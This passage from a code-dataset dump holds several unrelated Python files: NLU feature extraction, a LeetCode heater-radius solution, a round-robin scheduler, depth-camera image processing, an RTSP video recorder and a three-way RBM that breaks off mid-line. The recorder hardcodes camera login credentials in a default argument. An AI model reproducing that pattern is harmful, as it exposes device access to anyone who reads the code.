Please check your configuration file.\"\n )\n\n label_ids = np.array([idx for (idx, _) in labels_idx_examples])\n # explicitly add last dimension to label_ids\n # to track correctly dynamic sequences\n label_data.add_features(\n LABEL_KEY,\n LABEL_SUB_KEY,\n [FeatureArray(np.expand_dims(label_ids, -1), number_of_dimensions=2)],\n )\n\n label_data.add_lengths(LABEL, SEQUENCE_LENGTH, LABEL, SEQUENCE)\n\n return label_data\n\n\n\n @staticmethod\n def _find_example_for_label(\n label: Text, examples: List[Message], attribute: Text\n ) -> Optional[Message]:\n for ex in examples:\n if ex.get(attribute) == label:\n return ex\n return None\n\n def _check_labels_features_exist(\n self, labels_example: List[Message], attribute: Text\n ) -> bool:\n \"\"\"Checks if all labels have features set.\"\"\"\n\n return all(\n label_example.features_present(\n attribute, self.component_config[FEATURIZERS]\n )\n for label_example in labels_example\n )\n def _extract_labels_precomputed_features(\n self, label_examples: List[Message], attribute: Text = INTENT\n ) -> Tuple[List[FeatureArray], List[FeatureArray]]:\n \"\"\"Collects precomputed encodings.\"\"\"\n features = defaultdict(list)\n\n for e in label_examples:\n label_features = self._extract_features(e, attribute)\n for feature_key, feature_value in label_features.items():\n features[feature_key].append(feature_value)\n\n sequence_features = []\n sentence_features = []\n for feature_name, feature_value in features.items():\n if SEQUENCE in feature_name:\n sequence_features.append(\n FeatureArray(np.array(feature_value), number_of_dimensions=3)\n )\n else:\n sentence_features.append(\n FeatureArray(np.array(feature_value), number_of_dimensions=3)\n )\n\n return sequence_features, sentence_features\n\n def _extract_features(\n self, message: Message, attribute: Text\n ) -> Dict[Text, Union[scipy.sparse.spmatrix, np.ndarray]]:\n (\n sparse_sequence_features,\n sparse_sentence_features,\n ) = message.get_sparse_features(attribute, self.component_config[FEATURIZERS])\n dense_sequence_features, dense_sentence_features = message.get_dense_features(\n attribute, self.component_config[FEATURIZERS]\n )\n\n if dense_sequence_features is not None and sparse_sequence_features is not None:\n if (\n dense_sequence_features.features.shape[0]\n != sparse_sequence_features.features.shape[0]\n ):\n raise ValueError(\n f\"Sequence dimensions for sparse and dense sequence features \"\n f\"don't coincide in '{message.get(TEXT)}'\"\n f\"for attribute '{attribute}'.\"\n )\n if dense_sentence_features is not None and sparse_sentence_features is not None:\n if (\n dense_sentence_features.features.shape[0]\n != sparse_sentence_features.features.shape[0]\n ):\n raise ValueError(\n f\"Sequence dimensions for sparse and dense sentence features \"\n f\"don't coincide in '{message.get(TEXT)}'\"\n f\"for attribute '{attribute}'.\"\n )\n\n # If we don't use the transformer and we don't want to do entity recognition,\n # to speed up training take only the sentence features as feature vector.\n # We would not make use of the sequence anyway in this setup. 
Carrying over\n # those features to the actual training process takes quite some time.\n if (\n self.component_config[NUM_TRANSFORMER_LAYERS] == 0\n and not self.component_config[ENTITY_RECOGNITION]\n and attribute not in [INTENT, INTENT_RESPONSE_KEY]\n ):\n sparse_sequence_features = None\n dense_sequence_features = None\n\n out = {}\n\n if sparse_sentence_features is not None:\n out[f\"{SPARSE}_{SENTENCE}\"] = sparse_sentence_features.features\n if sparse_sequence_features is not None:\n out[f\"{SPARSE}_{SEQUENCE}\"] = sparse_sequence_features.features\n if dense_sentence_features is not None:\n out[f\"{DENSE}_{SENTENCE}\"] = dense_sentence_features.features\n if dense_sequence_features is not None:\n out[f\"{DENSE}_{SEQUENCE}\"] = dense_sequence_features.features\n\n return out","sub_path":"src/mynlu/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":11395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647462412","text":"\"\"\"\nYour input will be the positions of houses and heaters seperately, and your expected output will be the minimum radius standard of heaters.\n\nNote:\nNumbers of houses and heaters you are given are non-negative and will not exceed 25000.\nPositions of houses and heaters you are given are non-negative and will not exceed 10^9.\nAs long as a house is in the heaters' warm radius range, it can be warmed.\nAll the heaters follow your radius standard and the warm radius will the same.\n \nExample 1:\nInput: [1,2,3],[2]\nOutput: 1\nExplanation: The only heater was placed in the position 2, and if we use the radius 1 standard, then all the houses can be warmed.\n\nExample 2:\nInput: [1,2,3,4],[1,4]\nOutput: 1\nExplanation: The two heater was placed in the position 1 and 4. We need to use radius 1 standard, then all the houses can be warmed.\n\n由于headers和houses可能是乱序,所以要先排序。然后给heaters两端各加一个假的heater,这样所有house都会在heater之中。对每一个house,检查它与两端\nheaters的距离,较小的那个辐射半径就足够了,然后找出这些辐射半径里的最大值,保证所有房子都可以辐射的到。\n\n\"\"\"\n\ndef findRadius(self, houses, heaters):\n \"\"\"\n :type houses: List[int]\n :type heaters: List[int]\n :rtype: int\n \"\"\"\n houses.sort()\n heaters.sort()\n ans, i = 0, 0\n new_heaters = [float('-inf')] + heaters + [float('inf')]\n for house in houses:\n while house > new_heaters[i + 1]:\n i += 1\n min_dis = min(house-new_heaters[i], new_heaters[i+1]-house)\n ans = max(ans, min_dis)\n return ans\n","sub_path":"leetcode-475. Heaters.py","file_name":"leetcode-475. 
Heaters.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"583993321","text":"from random import randint\nfrom core.Planificador import Planificador\nfrom math import ceil\nclass RoundRobin4(Planificador):\n def __init__(self,log,quantum,procesos):\n Planificador.__init__(self,log,quantum*4,procesos)\n \n def iniciar_planificador(self):\n self.mostrar_procesos()\n self.planificar()\n \n def planificar(self):\n texto = \"\"\n total = 0\n procesos_listos = []\n for proceso in self.procesos:\n proceso = {\"nombre\":proceso.nombre,\"t\":ceil(proceso.t/self.quantum),\"quantum\":ceil(proceso.t/self.quantum),\"llegada\":proceso.llegada,\"inicio\":-1,\"fin\":0}\n procesos_listos.append(proceso)\n procesos_terminados = []\n texto = \"\"\n while(len(procesos_listos) > 0):\n procesos_temp = []\n avant = False\n for proceso in procesos_listos:\n if(proceso[\"quantum\"] > 0):\n if(proceso[\"llegada\"] > total and total == 0):\n proceso[\"inicio\"] = proceso[\"llegada\"]\n total = proceso[\"inicio\"]\n texto = texto + proceso[\"nombre\"]\n proceso[\"quantum\"] = (proceso[\"quantum\"] - 1)\n total = total + 1\n avant = True\n elif(proceso[\"llegada\"] == total and proceso[\"inicio\"]== -1):\n proceso[\"inicio\"] = total\n texto = texto + proceso[\"nombre\"]\n proceso[\"quantum\"] = proceso[\"quantum\"] - 1\n total = total + 1\n avant = True\n elif(proceso[\"llegada\"] < total):\n if(proceso[\"inicio\"] < 0):\n proceso[\"inicio\"] = total\n texto = texto + proceso[\"nombre\"]\n proceso[\"quantum\"] = proceso[\"quantum\"] -1\n total = total + 1\n avant = True\n procesos_temp.append(proceso)\n else:\n proceso[\"fin\"] = total\n procesos_terminados.append(proceso)\n if(avant == False):\n texto = texto + \"[ ]\"\n total = total + 1\n procesos_listos = procesos_temp\n for proceso in procesos_terminados:\n T = proceso[\"fin\"] - proceso[\"llegada\"]\n self.T_list.append(T)\n P = T/proceso[\"t\"]\n self.P_list.append(P)\n R = proceso[\"t\"]/T\n self.R_list.append(R)\n E = T - proceso[\"t\"]\n self.E_list.append(E)\n \n promedios = self.get_promedios()\n print(\"RR4: T={0}, E={1}, P={2}\".format(promedios['T'],promedios['E'],promedios['P']))\n print(texto)\n","sub_path":"tareas/3/RomeroVicente/core/RoundRobin4.py","file_name":"RoundRobin4.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102676236","text":"# coding: utf-8\n\nimport os\nimport cv2 as cv\nimport numpy as np\nimport json\nimport time\n\nclass R200Frame:\n \n def __init__(self, bgr_frame, depth_frame, depth_scale):\n self.rgb = cv.cvtColor(bgr_frame, cv.COLOR_BGR2RGB)\n self.depth = depth_frame\n self.depth_scale = depth_scale\n \n def depth_middle_crosshair(self, crosshair_size):\n \n height_ratio = self.rgb.shape[0]/self.depth.shape[0]\n width_ratio = self.rgb.shape[1]/self.depth.shape[1]\n \n depth_start_height = int((self.depth.shape[0]-crosshair_size)/2 - 1)\n depth_end_height = int((self.depth.shape[0]-crosshair_size)/2 - 1 + crosshair_size)\n depth_start_width = int((self.depth.shape[1]-crosshair_size)/2 - 1)\n depth_end_width = int((self.depth.shape[1]-crosshair_size)/2 - 1 + crosshair_size)\n \n rgb_start_height = int((depth_start_height + 1) * height_ratio - 1)\n rgb_end_height = int((depth_end_height + 1) * height_ratio - 1)\n rgb_start_width = int((depth_start_width + 1) * width_ratio - 1)\n rgb_end_width = int((depth_end_width + 1) * 
width_ratio - 1)\n \n # Sanity check\n if not (\n (rgb_start_height + crosshair_size*height_ratio == rgb_end_height) \n and (rgb_start_width + crosshair_size*width_ratio == rgb_end_width)):\n print(\"Crosshair making failed\")\n if not crosshair_size % 2 == 0:\n print(\"Crosshair size has to be an even number\")\n \n # Making a crossair on the color image\n display = self.rgb\n crosshair = np.zeros(display.shape, dtype=display.dtype)\n crosshair[rgb_start_height:rgb_end_height, rgb_start_width:rgb_end_width] = [255, 0 , 0]\n display = cv.add(display, crosshair)\n \n # Calculating depth on depth image\n center_values = self.depth[depth_start_height:depth_end_height,depth_start_width:depth_end_width].flatten()\n center_values = [value for value in center_values if value != 0 ]\n # If no values make mean = 0\n center_mean_value = np.mean(center_values) if len(center_values) != 0 else 0\n depth = center_mean_value * self.depth_scale\n \n return (depth, display)\n \n def depth_to_uint8(self):\n \n depth = self.depth\n depth = (depth/256).astype('uint8')\n \n return depth\n \n def depth_to_float32(self):\n \n depth = self.depth\n depth = depth.astype('float32')\n \n return depth\n \n def depth_to_rgb(self):\n \n depth = self.depth_to_uint8()\n depth = cv.cvtColor(depth, cv.COLOR_GRAY2RGB)\n \n return depth\n \n def clip_depth_max(self, max_distance):\n \n distance_upper_limit = max_distance / self.depth_scale / 256\n\n # All values out of range set to black\n clip_max = np.copy(self.depth_to_uint8())\n clip_max[clip_max > distance_upper_limit] = 0\n \n return clip_max\n \n def find_contours(self):\n \n # Variables\n max_distance = 10\n gaussian_filter_size = 7\n length_threshold = 150\n \n # Finding edges in depth image\n clipped = self.clip_depth_max(max_distance)\n gaussian = cv.GaussianBlur(clipped, (gaussian_filter_size, gaussian_filter_size), 0)\n canned = cv.Canny(gaussian, 10, 25, L2gradient=True)\n \n img, c, h = cv.findContours(canned, cv.RETR_TREE, cv.CHAIN_APPROX_NONE)\n contours = np.zeros((canned.shape), np.uint8)\n\n for cnt in c:\n if cv.arcLength(cnt, True) > length_threshold:\n cv.drawContours(contours, cnt, -1, 255, 1)\n \n return contours\n \n def find_bounding_box(self):\n \n contours = self.find_contours()\n \n # HoughLine transform no 1\n delta_theta = 15 #degrees\n min_line_length = 10 \n max_line_gap = 20\n hough_threshold = 20\n\n # Finding roughly vertical lines\n dilated = cv.dilate(contours, np.ones((2,2), np.uint8))\n linesP = cv.HoughLinesP(dilated,\n 1, \n np.pi/180, \n hough_threshold, \n None, \n min_line_length, \n max_line_gap)\n \n hough = np.zeros((contours.shape), np.uint8)\n \n if linesP is not None:\n for i in range(0, len(linesP)):\n \n l = linesP[i][0]\n atan = np.arctan2(l[1] - l[3], l[0] - l[2]) * 180 / np.pi\n\n if (((atan > 90 - delta_theta) \n & (atan < 90 + delta_theta)) \n | ((atan > -90 - delta_theta) \n & (atan < -90 + delta_theta))):\n cv.line(hough, (l[0], l[1]), (l[2], l[3]), 255, 2, cv.LINE_AA)\n \n bounding_box = self.depth_to_rgb()\n \n # HoughLine transform no 2\n min_line_length = 75\n max_line_gap = 5\n hough_threshold = 10\n \n edge_lines = cv.dilate(hough, np.ones((2,2), np.uint8))\n linesF = cv.HoughLinesP(edge_lines,\n 1, \n np.pi/180, \n hough_threshold, \n None, \n min_line_length, \n max_line_gap)\n \n edges = np.zeros((contours.shape), np.uint8)\n\n if linesF is not None:\n for i in range(0, len(linesF)):\n l = linesF[i][0]\n cv.line(edges, (l[0], l[1]), (l[2], l[3]), 255, 2, cv.LINE_AA)\n cv.line(bounding_box, (l[0], l[1]), 
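# (segments surviving this second, stricter Hough pass are overlaid on the\n # depth visualization used as the bounding-box image)\n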
(l[2], l[3]), (0,0,255), 2)\n \n i = 0\n \n for column in edges.T:\n if sum(column) > 255 * 5:\n break\n i += 1\n i += 1\n min_x = i\n \n cv.line(bounding_box, (i, 0), (i, contours.shape[1]-1), (255,0,0), 2)\n \n i = contours.shape[1]-1\n \n for column in reversed(edges.T):\n if sum(column) > 255 * 5:\n break\n i -= 1\n i -= 1\n max_x = i\n \n cv.line(bounding_box, (i, 0), (i, contours.shape[1]-1), (255,0,0), 2)\n \n return bounding_box\n\n def values_between(self, bottom_distance_limit, top_distance_limit):\n \n # Threshold for bottom and top limit\n mask = cv.inRange(self.depth, bottom_distance_limit//self.depth_scale, \\\n top_distance_limit//self.depth_scale) \n nb_values = np.count_nonzero(mask)\n return (nb_values, mask)\n \n def show_depth_values(self, bottom_distance_limit, top_distance_limit):\n \n depth_color = self.depth_to_rgb()\n \n (nb_values, mask) = self.values_between(bottom_distance_limit, top_distance_limit)\n mask = cv.cvtColor(mask, cv.COLOR_GRAY2RGB)\n \n redmask = self.depth_to_rgb()\n redmask[:,:] = [255, 0 , 0]\n redmask = cv.bitwise_and(mask, redmask)\n \n depth_colored = cv.add(depth_color, redmask)\n \n return (nb_values, depth_colored)\n \n def depth_histogram(self, start, stop, nb_of_bins):\n \n histogram = []\n labels = np.linspace(start, stop, nb_of_bins, endpoint=True)\n diff = (stop-start)/(nb_of_bins-1)\n \n for bound in np.linspace(start, stop, nb_of_bins, endpoint=True):\n (nb_values, mask) = self.values_between(bound, bound + diff)\n histogram.append(nb_values)\n \n return (labels, histogram)\n \n def depth_min(self):\n \n simple_threshold = 150\n depth_min_value = 0\n \n min_distance = 0.5\n max_distance = 10.5\n diff = 2.5\n nb_of_bins = (max_distance - min_distance)/diff + 1.0\n \n # Calculate values for each bins\n for bound in np.linspace(min_distance, max_distance, nb_of_bins, endpoint=True):\n (nb_values, mask) = self.values_between(bound, bound + diff)\n depth_min_value = bound\n\n # Logic to determine distance\n if nb_values > simple_threshold:\n break\n\n min_distance = bound \n max_distance = bound + diff\n diff = 0.5\n nb_of_bins = (max_distance - min_distance)/diff + 1.0\n for bound in np.linspace(min_distance, max_distance, nb_of_bins, endpoint=True):\n (nb_values, mask) = self.values_between(bound, bound + diff)\n depth_min_value = bound\n\n # Logic to determine distance\n if nb_values > simple_threshold:\n break\n \n min_distance = bound \n max_distance = bound + diff\n diff = 0.1\n nb_of_bins = (max_distance - min_distance)/diff + 1.0\n for bound in np.linspace(min_distance, max_distance, nb_of_bins, endpoint=True):\n (nb_values, mask) = self.values_between(bound, bound + diff)\n depth_min_value = bound\n\n # Logic to determine distance\n if nb_values > simple_threshold:\n break\n\n return depth_min_value\n\n def depth_min_score(self):\n \n # Uses ROI to score if closest objects are relevant\n score = 3\n return score\n\n def detect_drone(self):\n gray = cv.cvtColor(self.rgb,cv.COLOR_BGR2GRAY)\n _,thresh = cv.threshold(gray,50,255,cv.THRESH_BINARY_INV)\n _,cnt,_ = cv.findContours(thresh,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_SIMPLE)\n if(len(cnt)!=0):\n c = max(cnt, key = cv.contourArea)\n return c\n else:\n return None\n\n def getDepthMeanValue(self,center,size):\n depth_start_height = center[1]-size*2\n depth_end_height = center[1]+size*2\n depth_start_width = center[0]-size\n depth_end_width = center[0]+size\n center_values = self.depth[depth_start_height:depth_end_height,depth_start_width:depth_end_width].flatten()\n center_values = 
[value for value in center_values if value != 0 ]\n center_mean_value = np.mean(center_values) if len(center_values) != 0 else 0\n depth = center_mean_value * self.depth_scale\n return depth\n \n \n def __str__(self):\n return ''.format(hex(id(self)))\n \n def __repr__(self):\n return ''.format(hex(id(self)))\n\nclass R200Video:\n \n __settings_name__ = 'Settings.json' # Will change to Settings.json\n __image_rgb_prefix__ = 'ImageRGB_'\n __image_rgb_suffix__ = '.jpg'\n __image_depth_prefix__ = 'ImageDepth_'\n __image_depth_suffix__ = '.tiff'\n \n def __init__(self, folder_path):\n self.path = folder_path\n self.error = False\n self.film_length = 0\n self.depth_scale = 0\n self.fps = 30\n self.camera = ''\n self.rgb_shape = 0\n self.depth_shape = 0\n self.frames = []\n \n # If folder_path doesn't finish with / add it\n if not folder_path.endswith('/'):\n self.path = folder_path + '/'\n \n # Check if the folder exists\n path_exist = os.path.isdir(self.path)\n if not path_exist:\n self.error = True\n \n # Check if settings file exists\n settings_exist = os.path.isfile(self.path + self.__settings_name__)\n if not settings_exist:\n self.error = True\n \n if self.error:\n print('No settings file found for video')\n return None\n \n self.parse_settings_file()\n \n # Get number of images\n file_list = os.listdir(self.path)\n self.film_length = len([file for file in file_list if '.tiff' in file])\n \n # Get all images\n for index in range(self.film_length):\n image_rgb_path = (self.path \n + self.__image_rgb_prefix__ \n + '{0:05}'.format(index) \n + self.__image_rgb_suffix__)\n image_depth_path = (self.path \n + self.__image_depth_prefix__ \n + '{0:05}'.format(index) \n + self.__image_depth_suffix__)\n \n frame = R200Frame(cv.imread(image_rgb_path),\n cv.imread(image_depth_path, cv.IMREAD_ANYDEPTH),\n self.depth_scale)\n self.frames.append(frame)\n \n # Get video shape\n self.rgb_shape = self.frames[0].rgb.shape\n self.depth_shape = self.frames[0].depth.shape\n \n if self.error:\n print('Error occured while loading video')\n \n \n def parse_settings_file(self):\n \n with open(self.path + self.__settings_name__, \"r\") as file:\n try:\n settings = json.load(file)\n \n if 'camera' in settings:\n self.camera = settings['camera']\n else:\n print('Camera type not found in settings')\n self.error = True\n \n if 'scale' in settings:\n try:\n self.depth_scale = float(settings['scale'])\n except:\n print('Scale could not be converted to float')\n self.error = True\n else:\n print('Depth scale not found in settings')\n self.error = True\n \n if 'fps' in settings:\n try:\n self.fps = int(settings['fps'])\n except:\n print('Fps could not be converted to int')\n self.error = True\n else:\n print('Fps not found in settings')\n self.error = True\n \n except json.JSONDecodeError:\n print('Settings file is not in correct JSON format')\n self.error = True\n \n \n def show_rgb(self):\n \n while True:\n\n for frame in self:\n\n cv.imshow(\"RGB Video\", cv.cvtColor(frame.rgb, cv.COLOR_RGB2BGR))\n \n # Exit if ESC pressed\n k = cv.waitKey(1) & 0xff\n if k == 27 : break\n \n time.sleep(1/self.fps)\n \n cv.destroyAllWindows()\n break\n \n return None\n \n def __getitem__(self, index):\n return self.frames[index]\n \n def __iter__(self):\n self.n = 0\n return self\n \n def __next__(self):\n if self.n <= self.film_length - 1:\n result = self.frames[self.n]\n self.n += 1\n return result\n else:\n raise StopIteration\n\n def next(self):\n if self.n <= self.film_length - 1:\n result = self.frames[self.n]\n self.n += 1\n return 
result\n else:\n raise StopIteration\n \n def __len__(self):\n return self.film_length\n \n def save(self, folder_path):\n # IMPLEMENT A WAY TO WRITE VIDEO ON DISK\n return True\n\n def __str__(self):\n return ''.format(hex(id(self)))\n \n def __repr__(self):\n return ''.format(hex(id(self)))\n","sub_path":"r200.py","file_name":"r200.py","file_ext":"py","file_size_in_byte":15974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401027928","text":"import cvlib as cv\nimport time\nimport cv2\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--cam'\t\t, default=\"rtsp://admin:admin1234@192.168.15.220:554/Streaming/channels/402\")\nparser.add_argument('--output'\t, default=\"Video.avi\")\nparser.add_argument('--max_time', type=float, default=300)\nargs = parser.parse_args()\n\nstart=time.time()\ncap \t\t\t\t= cv2.VideoCapture(args.cam)\nfourcc = cv2.VideoWriter_fourcc(*'DIVX')\nheight = cap.get(4)\nwidth = cap.get(3)\nout = cv2.VideoWriter(args.output, fourcc, 10.0, (int(width),int(height)))\nframe_count = 0\n\nwhile True:\n\t#print(time.time()-start,args.max_time)\n\tif (time.time()-start)>=args.max_time:\n\t\tprint(time.time()-start,frame_count/(time.time()-start))\n\t\texit()\n\n\tres, img = cap.read()\n\tframe_count += 1\n\tout.write(img)\n\t# cv2.imshow(\"asdf\",img)\n\n\t# if cv2.waitKey(1) & 0xFF == ord('q'):\n\t# \tprint(time.time()-start,frame_count/(time.time()-start))\n\t# \tbreak","sub_path":"pruebas/store_video.py","file_name":"store_video.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211915169","text":"\"\"\" An rbm implementation for TensorFlow, based closely on the one in Theano \"\"\"\n\nimport tensorflow as tf\nimport math\nimport numpy as np\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport itertools\n\n\ndef sample_prob(probs):\n \"\"\"Takes a tensor of probabilities (as from a sigmoidal activation)\n and samples from all the distributions\"\"\"\n return tf.nn.relu(\n tf.sign(\n probs - tf.random_uniform(probs.get_shape())))\n\n\ndef generate_v(n_v, mu_v, sig_v):\n v = np.random.normal(mu_v, sig_v, n_v)\n return v\n\n\ndef gen_batches(data, batch_size):\n \"\"\"Divide input data into batches.\n :param data: input data\n :param batch_size: size of each batch\n :return: data divided into batches\n \"\"\"\n data = np.array(data)\n\n for i in range(0, data.shape[0], batch_size):\n yield data[i:i + batch_size]\n\n\nclass RBM(object):\n \"\"\" represents a 3-way rbm \"\"\"\n\n def __init__(self, name, v1_size, h_size, v2_size, n_data, batch_size, num_epochs=100, learning_rate=0.1, k=1,\n use_tqdm=True, show_err_plt=True,n_factors=50):\n with tf.name_scope(\"rbm_\" + name):\n self.v1_size = v1_size\n self.v2_size = v2_size\n self.h_size = h_size\n self.fweights_v1 = tf.Variable(\n tf.truncated_normal([v1_size, n_factors],\n stddev=1.0 / math.sqrt(float((v1_size + v2_size) / 2))), name=\"weights\")\n self.fweights_v2 = tf.Variable(\n tf.truncated_normal([v2_size, n_factors],\n stddev=1.0 / math.sqrt(float((v1_size + v2_size) / 2))), name=\"weights\")\n self.fweights_h = tf.Variable(\n tf.truncated_normal([h_size, n_factors],\n stddev=1.0 / math.sqrt(float((v1_size + v2_size) / 2))), name=\"weights\")\n self.h_bias = tf.Variable(tf.zeros([1, h_size]), name=\"h_bias\",dtype=tf.float32)\n self.v1_bias = tf.Variable(tf.zeros([1, v1_size]), name=\"v1_bias\",dtype=tf.float32)\n self.v1_var = 
tf.constant(np.ones([v1_size]), name=\"v1_var\",dtype=tf.float32)\n            self.v2_bias = tf.Variable(tf.zeros([1, v2_size]), name=\"v2_bias\",dtype=tf.float32)\n            self.v2_var = tf.constant(np.ones([v2_size]), name=\"v2_var\",dtype=tf.float32)\n\n            self.batch_size = batch_size\n            self.n_batches = n_data // batch_size  # assume it will be an integer\n\n            self.num_epochs = num_epochs\n            self.learning_rate = learning_rate\n            self.k = k\n\n            self.use_tqdm = use_tqdm\n            self.show_err_plt = show_err_plt\n\n            self.v1_input = tf.placeholder('float32', (self.batch_size, self.v1_size))\n            self.v2_input = tf.placeholder('float32', (self.batch_size, self.v2_size))\n\n            self.compute_err = None  # filled in reconstruction error\n            self.tf_session = None\n            \n            self.cost = []\n\n            self.final_h = None\n\n    def _prop_helper(self, a, b, a_weights, b_weights, t_weights):\n        \"\"\"a and b should be matrices of row vectors\"\"\"\n        inter = tf.multiply(tf.matmul(a, a_weights),tf.matmul(b, b_weights))\n        return tf.matmul(inter,tf.transpose(t_weights))\n\n    def prop_v1v2_h(self, v1, v2):\n        \"\"\" P(h|v1,v2) \"\"\"\n        return tf.nn.sigmoid(self._prop_helper(v1, v2, self.fweights_v1, self.fweights_v2, self.fweights_h) + self.h_bias)\n\n    def prop_v1h_v2(self, v1, h):\n        \"\"\" P(v2|v1,h) \"\"\"\n        return self._prop_helper(v1, h, self.fweights_v1, self.fweights_h, self.fweights_v2) + self.v2_bias\n\n    def prop_v2h_v1(self, v2, h):\n        \"\"\" P(v1|v2,h) \"\"\"\n        return self._prop_helper(v2, h, self.fweights_v2, self.fweights_h, self.fweights_v1) + self.v1_bias\n\n    def sample_v1_given_v2h(self, v2, h):\n        \"\"\" generate sample of v1 from v2 and h\"\"\"\n        dist = tf.contrib.distributions.Normal(tf.cast(self.prop_v2h_v1(v2, h), tf.float32),\n                                               tf.cast(tf.tile(tf.expand_dims(self.v1_var, 0), [v2.get_shape().as_list()[0], 1]),\n                                                       tf.float32))\n        return tf.reduce_sum(dist.sample(1), 0)\n\n    def sample_v2_given_v1h(self, v1, h):\n        \"\"\" generate sample of v2 from v1 and h\"\"\"\n        dist = tf.contrib.distributions.Normal(tf.cast(self.prop_v1h_v2(v1, h), tf.float32),\n                                               tf.cast(tf.tile(tf.expand_dims(self.v2_var, 0), [v1.get_shape().as_list()[0], 1]),\n                                                       tf.float32))\n        return tf.reduce_sum(dist.sample(1), 0)\n\n    def sample_h_given_v1v2(self, v1, v2):\n        \"\"\" Generate a sample from the hidden layer \"\"\"\n        return sample_prob(self.prop_v1v2_h(v1, v2))\n\n    @staticmethod\n    def get_delta_products(t, a, b, a_weights, b_weights):\n        \"\"\" inputs are normalized feature vectors (i.e. 
v1/v1_var)\"\"\"\n        inter = tf.multiply(tf.matmul(a,a_weights),tf.matmul(b,b_weights))\n        return tf.matmul(tf.transpose(t),inter)\n\n    def gibbs(self, v1, h, v2):\n\n        # using mean field values\n        v1 = self.prop_v2h_v1(v2, h)\n        v2 = self.prop_v1h_v2(v1, h)\n        h = self.prop_v1v2_h(v1, v2)\n\n        # using sampling\n        # v1 = self.sample_v1_given_v2h(v2, h)\n        # v2 = self.sample_v2_given_v1h(v1, h)\n        # h = self.sample_h_given_v1v2(v1, v2)\n\n        return v1, h, v2\n\n    def train(self, v1_input, v2_input):\n        \"\"\"train RBM\"\"\"\n\n        self.pcd_k()  # define pcd step\n        self.reconstruction_error()  # define error metric\n\n        self.tf_session = tf.Session()\n        init = tf.global_variables_initializer()\n        self.tf_session.run(init)\n\n        pbar = tqdm(range(self.num_epochs))\n        for i in pbar:\n            avg_err = self.one_train_step(v1_input, v2_input)\n            self.cost.append(avg_err)\n            pbar.set_description('squared reconstruction average batch error: {}'.format(avg_err))\n\n            # catch divergence\n            if np.isnan(self.cost[-1]):\n                raise RuntimeError('Training has diverged - lower learning rate!')\n            # early stopping\n            if i > 20 and np.mean(self.cost[-20:-10]) - np.mean(self.cost[-10:]) < np.mean(self.cost[-20:]) * 0.01:\n                break\n\n        return self.cost\n\n    def one_train_step(self, v1_input, v2_input):\n        \"\"\"run one training step\"\"\"\n\n        updates = [self.fweights_v1, self.fweights_v2, self.fweights_h, self.v1_bias, self.v2_bias, self.h_bias]\n        err_tot = 0\n        # shuffle once with a shared permutation so v1/v2 pairs stay aligned\n        perm = np.random.permutation(v1_input.shape[0])\n        v1_input_list = np.split(v1_input[perm], self.n_batches)\n        v2_input_list = np.split(v2_input[perm], self.n_batches)\n        for i in range(self.n_batches):\n            self.tf_session.run(updates, feed_dict={self.v1_input: v1_input_list[i], self.v2_input: v2_input_list[i]})\n            err_tot += self.get_cost(v1_input_list[i],v2_input_list[i])\n        return err_tot / (self.batch_size * self.n_batches)\n\n    def pcd_k(self):\n        \"k-step (persistent) contrastive divergence\"\n\n        mcmc_v1, mcmc_v2 = (self.v1_input, self.v2_input)\n\n        start_h = self.prop_v1v2_h(self.v1_input, self.v2_input)\n        mcmc_h = start_h\n\n        for n in range(self.k):\n            mcmc_v1, mcmc_h, mcmc_v2 = self.gibbs(mcmc_v1, mcmc_h, mcmc_v2)\n\n        self.final_h = mcmc_h\n\n        # update fweights_v1\n        fw_v1_positive_grad = self.get_delta_products(tf.divide(self.v1_input,self.v1_var), start_h, tf.divide(self.v2_input,self.v2_var),self.fweights_h,self.fweights_v2) / self.batch_size\n        fw_v1_negative_grad = self.get_delta_products(tf.divide(mcmc_v1,self.v1_var), mcmc_h, tf.divide(mcmc_v2,self.v2_var),self.fweights_h,self.fweights_v2) / self.batch_size\n        self.fweights_v1 = self.fweights_v1.assign_add(self.learning_rate * (fw_v1_positive_grad - fw_v1_negative_grad))\n\n        # update fweights_v2\n        fw_v2_positive_grad = self.get_delta_products(tf.divide(self.v2_input,self.v2_var), start_h, tf.divide(self.v1_input,self.v1_var),self.fweights_h,self.fweights_v1) / self.batch_size\n        fw_v2_negative_grad = self.get_delta_products(tf.divide(mcmc_v2,self.v2_var), mcmc_h, tf.divide(mcmc_v1,self.v1_var),self.fweights_h,self.fweights_v1) / self.batch_size\n        self.fweights_v2 = self.fweights_v2.assign_add(self.learning_rate * (fw_v2_positive_grad - fw_v2_negative_grad))\n\n        # update fweights_h\n        fw_h_positive_grad = self.get_delta_products(start_h, tf.divide(self.v2_input,self.v2_var), tf.divide(self.v1_input,self.v1_var),self.fweights_v2,self.fweights_v1) / self.batch_size\n        fw_h_negative_grad = self.get_delta_products(mcmc_h, tf.divide(mcmc_v2,self.v2_var), tf.divide(mcmc_v1,self.v1_var),self.fweights_v2,self.fweights_v1) / self.batch_size\n        
self.fweights_h = self.fweights_h.assign_add(self.learning_rate * (fw_h_positive_grad - fw_h_negative_grad))\n\n        self.v1_bias = self.v1_bias.assign_add(self.learning_rate * tf.reduce_mean(self.v1_input - mcmc_v1, 0,\n                                                                                    keep_dims=True))\n        self.v2_bias = self.v2_bias.assign_add(self.learning_rate * tf.reduce_mean(self.v2_input - mcmc_v2, 0,\n                                                                                    keep_dims=True))\n\n        self.h_bias = self.h_bias.assign_add(self.learning_rate * tf.reduce_mean(start_h - mcmc_h, 0, keep_dims=True))\n\n\n    def get_cost(self, v1_input, v2_input):\n\n        return self.tf_session.run(self.compute_err, feed_dict={self.v1_input: v1_input,\n                                                                self.v2_input: v2_input})\n\n    def reconstruction_error(self):\n        \"\"\" The one-step reconstruction cost for both visible layers \"\"\"\n        h = self.prop_v1v2_h(self.v1_input, self.v2_input)\n\n        v1_err = 